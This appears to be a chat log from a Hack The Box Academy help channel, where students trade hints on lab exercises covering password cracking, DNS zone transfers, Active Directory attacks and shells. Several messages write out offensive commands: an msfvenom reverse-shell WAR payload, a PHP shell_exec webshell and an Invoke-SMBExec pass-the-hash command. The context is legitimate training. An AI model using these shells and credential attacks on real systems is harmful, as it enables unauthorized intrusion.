https://academy.hackthebox.com/module/147/section/1391 Hey guys, I'm in password attacks, password mutations https://academy.hackthebox.com/module/147/section/1391, I've look at hashcats FAQ and thier cheatsheet to see what might be wrong with my command. I basically c+ped from the HTB cheat sheet. The only thing I'm doing "differently" is trying to use best64.rules rather than a custom.rules

the module very explicitly has designed the challenges to use their provided rule list. You wont be safely guranteed to generate the correct passwords they picked out if you use a diff wordlist or rule set

okay

aka youre on your own

not bad practice for real world usage though

I went ahead and made custom.rule but still get "Illegal instruction"

im in shells&payloads module , and i am in the skill assessments , i need to hack 3 hosts but when i scan one of them the only informations that give it to me is that it is ||running tomcat 10.0.11 and smb2-security-mode 3.1.1|| that seems the right answer to me because i searched on google and i found an "exploit" on google :||https://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html|| someone can say to me if im going into the right way

@dire sage look on the desktop, there is a file that might help you

bruhhhh , thank you xd

so let's imagine i want to ||manage the blog|| , here there's no browser

i think i probably need to go throught ||apache||

type firefox in cli

"No protocol specified
uNABLE TO INIT SERVER ; coULD NOT CONNECT :CONNECTION REFUSED"

and nothing happened @maiden spindle

illegal instruction is gunna be some sort of issue with your environment or the binary youre using.

Youre either going to have to troubleshoot it on your own, or use the pwnbox momentarily for generating the list

😦 alright

ty

On information gathering: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

I am getting: Server: 75.75.75.75
Address: 75.75.75.75#53

** server can't find inlanefreight.htb: NOTIMP
; Transfer failed.

Same if I use the IP

I have the IP linked to the domain name in my /etc/hosts

There's a module before ad enum in the pen tester job role path all about pivoting and port forwarding

Remove the ip from your etc hosts and try again with the ip

got the same result with nslookup

a.root-servers.net does not work

The format should be nslookup domain ip

And dig is
dig type domain @ip

root.inlanefreight.htb did not work

dig inlanefreight.htb @10.129.44.174 command returned root.inlanefreight.htb

nslookup inlanefreight.htb 10.129.44.174 returned *** Can't find inlanefreight.htb: No answer

I thought I had to have it in my /etc/hosts?

so dig ns worked like someone recommended in the comments earlier

why does that particular command work and why do I have to keep the /etc/hosts empty of the link between the two. It doesn't make sense.

I guess just try with and without it in /etc/hosts?

still doesn't explain why dig ns worked

nslookup -type=any -query=AXFR inlanefreight.htb failed as well

once you've impersonated that user, you functionally are that user

and they might not have impersonation privileges

take note that in that section, the command to revert is REVERT iirc

You need to add the ip after the domain

Yeah, thanks, that worked

I was mislead by this

The lesson made it seem like just the domain name

Can someone please help with AD Enumeration & Attacks - Skills Assessment Part 2

Last 2 questions.
I've been at it for a week now not sure how to compromise DC01 to get the admin flag and NTLM hash for krbtgt. Please help 🙏

Where do we get the patterns file for question 2

for information gathering

I'd have to boot up the lab to see, but I'm currently working on something else right now

but iirc there's a command that will just return a list of users that you can impersonate

I can't find the ./patterns file in the cheatsheet

is that in the github page, becuase there are some patterns files there it seems

and how can I tell when I need to have the ip in my /etc/hosts file or not?

it works for some, and not for others

is there any point in looking at the beginning of a walk through up to the point where I am stuck and then stopping? is this a good idea for the privilege escalation portion of the module? that portion of the module is kind of telling you how to do the privesc but I'm thinking I was stuck on that module for a while and now took a couple weeks off from that. what do you think?

Also this isn't working for this lesson

how do I check my api query

understandable o7

.htb is not a valid top level domain, all of the DNS techniques that you want to use must require you to declare the spawned server as the DNS server

It's not going to, that tool is for registered websites

Any tips on the second question?: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

Count a records

You may need to do 2 transfers

Oh wait

I was thinking use gobuster, but I don't have a patterns file

Different question

This is a simple question

Read the definition of a DNS zone

I found the answer by guessing, I just would like to know how to arrive at the answer

Honestly it's something you may have to Google to really understand

Take a look at your query answers

And think how it could lead you to that answer

These?

How do I hide spoilers, I wanted to clarify something.

Do I need to have the ip and domain in the etc/hosts file for these questions?

Found this WITH the etc/hosts file

But that doesn't work for question 2

It's doable without

This section is all about using command line tools, axfr (zone transfer) will give you some answers

Do I need to do anything else to set up my system in regards to dns?

No

It's doable with default dns settings

I've done it

It actually looks like there are over a dozen zones

so I'm not sure why the answer is what it is for the second question

Think about the answer you got

but I cant access them to find the txt file

And look at all the info you're given

Perhaps you need to dig one level deeper

For the txt file

so I have inlanefreight.htb and then I have the nameserver=xxxxxxxx

and then a bunch of subdomains

like 20 of them

that's not the answer though

Subdomain =/= zone btw

Take a look at the subdomains then try and axfr off those

Just manually one by one?

Just want to clarify before I spend the time

Since there's so few

Go shortest length to longest

A.inlanefreight.htb is gonna be your hint (A being any subdomain)

nslookup -type=any -query=AXFR <SUBDOMAIN> <IP>

like that?

Since you're seeing some that are a.b.c...inlanefreight.htb

Don't ask just try

I don't see any with a, b, c

Always try your thought then ask if it doesn't yield results

Because those are placeholders

here's one example

A being one level of subdomain, b being another etc

I think my command is wrong, it's not finding any of these

Try with dig axfr

Your command isn't wrong

I would but I'm in the active enumeration section

You're expected to get failures on the ones you're not meant to access

can you explain why it says this in the lesson, but there is no IP?

I used "ip" in place of "nameserver" so you can properly move on

And since its a public site the name server resolves through public dns

So how would I normally do that?

Also the nameserver wouldn't be root.inlanefreight.htb

All they give in the first question is the domain

Like there's a lot about dns that either you or the module glossed over

Yes

And from the domain you can find the nameserver

Okay, so trial and error found it!

Thank you!

Sorry it just seemed weird to go through manually one by one

You can create a simple bash script that can go through them

Still dont understand why there are only x zones.

Is there a hint you can give me without a spoiler?

Is it lower than you thought?

WAAYYYY lower!!!

I thought it was over a dozen

because of all the subdomains

there's nothing in the text of the outputs where I can clearly see "x" zones

I wish I could post spoilers

It's painfully obvious when you see it

SOA

tfw you spend 30 mins on a question only to realize you had it in the first 2 because of case sensitive answers

SOA?

I don't see SOA in any of the outputs.

https://tenor.com/view/waah-waa-sad-wah-waaah-gif-25875771

For skill assessment part 2 in ad enum and attacks, how do I gain access to the DC as user CT*?

-type=SOA

What tool will show me the SOAs?

I have winrm to MS01 as admin but not sure where to go from here

Nslookup

Let the hound guide you

I mainly use dig, as nslookup is just painfully limited

i tried: dig any inlanefreight.htb @<IP>

o,o

connection failed, timed out, host unreachable

do I have to remove /etc/hosts for this?

I'm so confused what is going on

Okay, found it with dig, had to respawn the machine, something was wrong.

Nslookup, by its limitations though allows you to have specific queries without additional fluff

Dig is just superior at providing the more broad info

I'm so confused ;-;

The hound that's good with tracking

I'm currently RDPed in MS01, followed the instructions of the hound

The hound tells all 🐕

right clicking the edge will give you abuse info

Ponder the hound?

I've done the abuse info

Idk what I'm missing here

I'm so close

How do I decide which user to add to the domain admins

you could always make a new user and then add that user to domain admins

or just add yourself

Exception calling add with 1 argument

Wtf.

I can't execute add domaingroupmember without an error

https://en.m.wikiversity.org/wiki/Net_(command)/User#:~:text=To add a user account,net user Bill Passw0rd %2Fadd.

Hi there. No I’m proper stuck on this! Obvious to some people but clearly not obvious to others. I’m ok with a challenge but this is frustrating. The module should teach all the required techniques! Shouldn’t have to go digging through other modules which is what I’m currently doing! Please let me know if you find anything useful as I’m proper out of ideas here

To get the password you may need yo look for an important file

Browsing available files will give you credentials

I've created a new user alrdy

Exact same way as stated

Hmmm

Power view is taking it as null though

Are you in admin powershell?

I'm running the powershell as admin

Lol

Available files? Where? On the SQL server? I see IMAP, so thinking I could enumerate that, not sure why a file with a password hash would be there tho

Can you remind me what you're working on?

Just so I can properly guide you

I've attempted adding another user, worked. Now just have to figure out how to access the DC now @wary plover

Attacking SQL Databases

Trying to find password for MSSQLsvc

From Attacking Common Services, yes?

👍

Read the section carefully I believe it tells you what you need to know

I am checking my notes in a moment

Sorry but Iv done that hence why I’m asking here

I’ll eat my words if the section notes explain it

I haven't updated my notes for common Services

YAY

I got it

Ty guys

Now just last question

Hash stealing

You have access to the sql server as the base user (not all databases, but that's not necessary)

Ok, I’m clearly well out my depth here. I do yes but I cannot find any hashes

I take donations

It's in the section

Ok thanks

Basically ctrl+f for those keywords and the module section will take it from there

I was told by staff I cannot charge for my assistance

But seriously don't

Anyway gl

is it possible to reset a module? stepped away for a bit an want to restart

You can just go from the top

And if you were taking decent or any notes: you'll be able to easily pick it up

Instances have their own lifetime that can be extended up to like 6 hours

But by default are only set to like 1-2

But when they die/you reset them any and all progress is lost

*unless progress was related to pwning a user

Otherwise that seems more of a question to message support for rather than randomly ask on discord

Yes answers are retained

And any pregenerated info

Like internal pivots

(Shells & payload module, skill assessment targets)

Otherwise some of it would be a pain in the ass to troubleshoot

Being able to narrow down the points of failure is important

User or htb (usually user)

Did you manage to solve it? I found that the cache changed, try looking trhrough the tmp again and use the other cacche keytab

For the answer regarding the linux01$ user: the realm hides a daemon you must find

I havent gotten that far yet hahaha still getting Julios flag

Ah

Smb

Also they do throw some expired ccaches in there

Just to keep you on your toes

i realized it after speding 30mins reading through the whole section all over again
great not the julio.txt file does not work -.-

The execute permission was denied on the object ‘xp_subdirs’ is as far as I get following the content in the module

Check your listener

Responder or the impacket smb one

Just realized i only copied part of the flag -.-

Using responder but the syntax is pretty simple

And you have it set to use -I tun0

Yeah

Ah I think it’s the IP

You should probably use your ip

X3

Still the same! Jesus, I give up, thanks anyway 👍

Your tun0 ip?

Also scroll up on the section

Maybe it's not enabled

And you need to enable

For the "Pass the Ticket (PtT) from Linux" module, can anyone give me a hint with the last question "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

There is a keytab file under /etc/krb5.keytab i am guessing thats the keytab file for the machine and I have to impersonate that, but i am not sure how to use that :/

guys i have a question

i solved this module step : https://academy.hackthebox.com/module/77/section/853

but i wanna know why in this part

||works only when i called from /home/.., but if i called directly like sudo ./monitor.sh dont works||

The sudo privs are specifically for the full path.

i am a little confuse

so when i ever user sudo this mean i use the root user to called, i am right ?

Yes.

but

why i can use in my linux sudo in anywhere ?

i mean for example

if i try to run in my linux sudo monitor.sh works

but when i try to use that in the target dont works

If the sudo privs were set up that way, you could. The way this is set up, they won't.

    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh```

This is the only thing you are allowed to do with sudo, as your user.

ohh i understand now

so linEnum in this case

list all the files that can be run directly using all the path

i am right ?

For the purposes of this module, yes.

in this cas NOPASSWD means not require password for that specific file

?

but if i try another file

Yes, it means you can run sudo without password.

oh i understand now

thank you

Cheers

https://academy.hackthebox.com/module/18/section/2100
this module is all about system logs. im searching for auth.log but can't seem to find it in my own machine but there is on pwnbox. im wondering where i can see it or if there is something im missing about...

you're given an IP:PORT, did you check what is running over it before jumping to port 445?

Try again. I had the same issue

in the Password Attack Lab - Medium I found the|| zip file ||to crack by when I use ||zip2john ||to get the hash I get this massive wall of hash that seems way too big to be cracked. Am I doing something wrong?

@rustic sage hi I need help with skills assessment Part 2 getting on to dc01.

Would appreciate a nudge forward

did you try to crack it anyway?

Hi

Sure, dm me

ayo

i did try with a wordlist or two and both failed the i just went with|| john zip.hash|| and my cpu went on an adventure ... the hash i got is like a page long as oppose to a line or so that we see in examples

am not getting the reverse shell i've created payload :msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f war > runme.war
Payload size: 1105 bytes
Final size of war file: 1105 bytes

as for the wordlist use the mutated one

but when i upload it to tomcat service it just dont give me session is it because there is some firewall rules ?

cont :The Live Engagement

mmm let me try that

mod :SHELLS & PAYLOADS

have you deployed the "payload" from the administration panel?

am working on apache tomcat not on the blog

i hate myself... it worked thanks for the assist ... totally forgot about the custom rule

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v -l -p 4444

the multi handlr >

?

on it

didn't worked

sf6 exploit(multi/handler) > set lhost 10.10.14.61
lhost => 10.10.14.61
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.61:4444

even tho in the tomccat the running status is true

yes

msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > options

through this :xfreerdp /v:10.129.163.142 /u:htb-student /p:HTB_@cademy_stdnt! /drive:/home/kali/Desktop
i grabed the payload from the local

hello friends, i am at AD Enumeration & Attacks - Skills Assessment Part I, to reach MS01 i tried having reverse shells from the webshell, all msf sessions are dying and netcat freezes , sometimes i can proxy and get rdp to MS01 but not more than 10 minuets then it freezes, i am trying for 3 days now but cant make any progress because of this, nothing is stable, is there any tips please

Hi. I am currently stuck at Attacking Common Services Easy after obtaining the web shell. I am probably missing something obvious, but I am not able to pass commands that contain whitespace etc. URL encoding does not help. So that means I am stuck with one-word commands. What am i missing? 😦

Sounds like your connection isn't great. Switch your VPN to TCP, instead of UDP.

it is TCP, i will try to change it anyway

Are you positive? Every time I've heard this complain, it's been that the VPN is UDP.

Something probably wrong with your url command or your web shell. Url encoding spaces as %20 should work

yes i had this issue before and fixed it by changing to TCP, i will try to download it again and see what will happen

i just deleted my response because i realised i made a critical error in simply reading. i'm so sorry but your question cleared things up i think. i will reattempt. thanks!

no worries everyone make mistakes

The webshell is pretty textbook with <?php echo shell_exec($_GET['cmd']);? and both cd C%3A%2F and cd%20C%3A%2F seem to fail. Is it because i am going to the browser and not curl?

Need help with Password Attacks/Credential Hunting in Linux module.
||I am ssh'd in as kira, i see the .mozilla directory, firefox_decrypt didn't work with newest version (python3.9+ required so i used an older one that works on the target. Running the older firefox_decrypt, it asks for for me master password. I tried a few passwords but can't get it... what am i missing? ||

Why are you sending windows commands at a Linux box?

are you sure python3.9 isn't available on the target machine?

||kira@nix01:~$ python3 --version
Python 3.8.10||

try whereis

It is a Windows server?

argh. thank you. But then it will still asks me for the master password or not?

I don't remember honestly

Ah okay, thanks anyways 😄 maybe it will help!

I figured it out... ||there is no password needed omfg hahaha||

Oh. You’re right. I misread my own notes. 😅
Try sending direct commands rather than cd. Ie dir

I dont understand what happened, but I guess something worked and spaces etc are ok now. Thanks!

Hi
Is somebody to help me with this question ?

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

https://academy.hackthebox.com/module/147/section/1638

im connecting with Julio hash in RDP, i make the command with MS01 hash to get a shell i launch a nc.exe -lvnp 8001, in another rdp i import invoke the hash and i launch the command Invoke-SMBExec -Target 10.129.25.219 -Domain inlanefreight.htb -Username julio -Hash JULIOHASH -Command "powershell -e base 64".

i get a rev shell on the netcat instance but i cant get c:/julio directory

You want to pass the hash to dc01 not ms01, so your ip is wrong